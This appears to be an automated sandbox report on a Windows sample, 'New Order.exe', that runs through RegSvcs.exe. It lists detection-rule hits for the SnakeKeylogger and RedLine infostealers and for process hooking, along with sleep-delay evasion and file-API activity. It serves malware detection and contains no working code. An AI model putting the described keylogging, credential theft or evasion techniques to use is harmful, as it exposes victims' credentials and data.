Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 00000000.00000002.1263248786.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073 |
Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000002.00000002.3707765175.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073 |
Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: C:\Users\user\Desktop\New Order.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\New Order.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599890 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599781 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599671 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599562 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599453 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599343 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599234 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599125 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599015 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598906 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598797 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598682 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598578 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598468 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598359 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598249 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598140 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598031 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597921 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597812 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597703 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597593 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597484 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597375 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597265 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597156 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597046 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596937 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596828 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596717 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596609 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596500 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596390 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596280 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596171 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596062 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595953 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595843 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595734 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595625 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595515 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595406 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595296 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595187 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595078 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594968 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594859 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594750 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594640 |
Jump to behavior |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0032DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, |
0_2_0032DBBE |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_002FC2A2 FindFirstFileExW, |
0_2_002FC2A2 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_003368EE FindFirstFileW,FindClose, |
0_2_003368EE |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0033698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, |
0_2_0033698F |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0032D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, |
0_2_0032D076 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0032D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, |
0_2_0032D3A9 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_00339642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_00339642 |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_0033979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_0033979D |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_00339B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, |
0_2_00339B2B |
Source: C:\Users\user\Desktop\New Order.exe |
Code function: 0_2_00335C97 FindFirstFileW,FindNextFileW,FindClose, |
0_2_00335C97 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599890 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599781 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599671 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599562 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599453 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599343 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599234 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599125 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599015 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598906 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598797 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598682 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598578 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598468 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598359 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598249 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598140 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598031 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597921 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597812 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597703 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597593 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597484 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597375 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597265 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597156 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597046 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596937 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596828 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596717 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596609 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596500 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596390 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596280 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596171 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596062 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595953 |
Jump to behavior |
